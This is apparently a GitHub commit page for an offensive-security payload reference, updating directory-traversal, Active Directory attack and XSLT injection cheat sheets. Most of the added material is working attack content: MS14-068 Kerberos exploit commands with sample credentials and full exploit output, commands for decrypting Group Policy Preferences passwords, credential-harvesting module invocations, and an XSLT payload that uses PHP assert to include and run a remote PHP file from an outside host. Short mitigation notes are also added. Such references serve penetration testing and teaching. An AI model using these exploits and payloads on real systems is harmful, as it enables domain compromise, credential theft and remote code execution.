Skip to content

Commit

Permalink
AD mitigations
Browse files Browse the repository at this point in the history
  • Loading branch information
@swisskyrepo
swisskyrepo committed Dec 26, 2019
1 parent 1535c5f commit 4b10c5e
Show file tree
Hide file tree
Showing 3 changed files with 60 additions and 20 deletions.
2 changes: 2 additions & 0 deletions Directory Traversal/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -117,6 +117,8 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
```

### Interesting Windows files
Expand Down
64 changes: 44 additions & 20 deletions Methodology and Resources/Active Directory Attack.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
- [Open Shares](#open-shares)
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
- [Using ndtsutil](#using-ndtsutil)
- [Using Vshadow](#using-vshadow)
Expand Down Expand Up @@ -214,11 +214,22 @@ Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
```

```powershell
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
git clone https://github.com/SecWiki/windows-kernel-exploits
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u [email protected] -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
python ./ms14-068.py -u [email protected] -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
$ python ./ms14-068.py -u [email protected] -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u [email protected] -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u [email protected] -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
-1105
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
[+] Creating ccache file '[email protected]'... Done!
```

Then use `mimikatz` to load the ticket.
Expand All @@ -237,6 +248,11 @@ Linux> sudo date -s "14 APR 2015 18:25:16"
Windows> net time /domain /set
```

#### Mitigations

* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780


### Open Shares

```powershell
Expand Down Expand Up @@ -317,11 +333,11 @@ IconIndex=1
```


### GPO - Pivoting with Local Admin & Passwords in SYSVOL
### Passwords in SYSVOL & Group Policy Preferences

:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local

Find password in SYSVOL (MS14-025)
Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.

```powershell
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Expand All @@ -338,20 +354,22 @@ echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
```

Metasploit modules to enumerate shares and credentials
#### Automate the SYSVOL and passwords research

```c
scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
```
* Metasploit modules to enumerate shares and credentials

Crackmapexec modules
```c
scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
```

```powershell
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
```
* Crackmapexec modules

```powershell
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
```

List all GPO for a domain

Expand All @@ -364,6 +382,12 @@ Get-NetGPO
Get-NetGPOGroup
```

#### Mitigations

* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
* Delete existing GPP xml files in SYSVOL containing passwords.
* Don’t put passwords in files that are accessible by all authenticated users.

### Dumping AD Domain Credentials

You will need the following files to extract the ntds :
Expand Down Expand Up @@ -679,7 +703,7 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
```

Mitigations:
* Have a very long password for your accounts with SPNs
* Have a very long password for your accounts with SPNs (> 25 characters)
* Make sure no users have SPNs

### KRB_AS_REP Roasting
Expand Down
14 changes: 14 additions & 0 deletions XSLT Injection/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -132,6 +132,20 @@ Execute the function `scandir`.
</xsl:stylesheet>
```

Execute a remote php file using `assert`

```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:variable name="payload">
include("http://10.10.10.10/test.php")
</xsl:variable>
<xsl:variable name="include" select="php:function('assert',$payload)"/>
</body>
</html>
```

Execute a PHP meterpreter using PHP wrapper.

```xml
Expand Down

0 comments on commit 4b10c5e

Please sign in to comment.